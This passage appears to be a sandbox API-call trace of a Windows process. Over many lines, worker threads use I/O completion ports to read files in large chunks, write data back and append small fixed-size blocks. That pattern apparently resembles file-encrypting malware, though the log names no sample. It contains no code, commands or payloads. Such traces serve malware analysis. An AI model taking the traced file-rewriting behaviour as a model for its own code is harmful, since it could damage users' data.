GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 Thread: id = 119 os_tid = 0xbf0 [0148.851] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0155.975] CloseHandle (hObject=0x19c) returned 1 [0155.997] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0156.001] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.001] CloseHandle (hObject=0x1a0) returned 1 [0156.014] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0156.017] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.317] WriteFile (in: hFile=0x1a0, lpBuffer=0x3480124, nNumberOfBytesToWrite=0x1188a, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020) returned 0x0 [0156.322] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.324] WriteFile (in: hFile=0x1a8, lpBuffer=0x3900124, nNumberOfBytesToWrite=0xe999, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020) returned 0x0 [0156.331] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.331] WriteFile (in: hFile=0x1d0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020) returned 1 [0156.353] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.353] WriteFile (in: hFile=0x19c, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x37e0020) returned 1 [0156.362] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0156.362] CloseHandle (hObject=0x1c0) returned 1 [0156.409] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0156.411] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.719] WriteFile (in: hFile=0x1d4, lpBuffer=0x3870124*, nNumberOfBytesToWrite=0x13e8d, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3870020) returned 1 [0158.724] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.724] ReadFile (in: hFile=0x19c, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x35a0020) returned 1 [0158.724] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.724] ReadFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 0x0 [0158.724] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.725] ReadFile (in: hFile=0x1cc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3480020) returned 0x0 [0158.725] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.725] ReadFile (in: hFile=0x1c, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3630020) returned 0x0 [0158.725] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.725] ReadFile (in: hFile=0x1e0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3750020) returned 0x0 [0158.725] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.725] ReadFile (in: hFile=0x1d4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3870020) returned 0x0 [0158.725] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.725] WriteFile (in: hFile=0x19c, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x2f25, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.748] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.748] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.748] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.748] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0158.748] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.748] WriteFile (in: hFile=0x1ac, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0158.753] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.753] ReadFile (in: hFile=0x1f0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0158.753] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.754] ReadFile (in: hFile=0x19c, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0158.754] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.754] WriteFile (in: hFile=0x1cc, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3480020) returned 1 [0158.758] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.758] WriteFile (in: hFile=0x1e0, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3750020) returned 1 [0158.782] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.782] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0158.782] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.782] CloseHandle (hObject=0x1ac) returned 1 [0158.810] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0158.913] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.913] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.913] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.913] CloseHandle (hObject=0x1cc) returned 1 [0158.914] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0158.917] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.917] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3510020) returned 1 [0158.917] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.917] CloseHandle (hObject=0x1c) returned 1 [0158.919] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0158.922] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.922] CloseHandle (hObject=0x1e0) returned 1 [0158.928] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0158.931] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.931] WriteFile (in: hFile=0x1a8, lpBuffer=0x3990094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3990020 | out: lpBuffer=0x3990094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3990020) returned 1 [0158.932] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.932] WriteFile (in: hFile=0x1f0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020) returned 1 [0158.932] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.932] CloseHandle (hObject=0x1d4) returned 1 [0158.934] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0158.937] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.937] ReadFile (in: hFile=0x1b4, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x36c0020) returned 1 [0158.937] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.937] ReadFile (in: hFile=0x194, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3900020) returned 1 [0158.938] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.938] WriteFile (in: hFile=0x19c, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x35a0020) returned 1 [0158.938] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.938] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x171f, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020) returned 1 [0158.938] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.938] CloseHandle (hObject=0x1a8) returned 1 [0158.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3990020) returned 1 [0158.955] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.955] CloseHandle (hObject=0x1f0) returned 1 [0158.957] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0158.960] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.960] WriteFile (in: hFile=0x1b4, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0xf91a, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020) returned 1 [0158.960] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.960] WriteFile (in: hFile=0x194, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0xecc, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020) returned 1 [0158.960] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.960] CloseHandle (hObject=0x19c) returned 1 [0158.962] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.965] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3510020) returned 0x0 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.965] ReadFile (in: hFile=0x1b4, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.965] ReadFile (in: hFile=0x194, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3900020) returned 0x0 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.965] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.965] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0158.966] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0158.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.966] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020) returned 1 [0158.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, 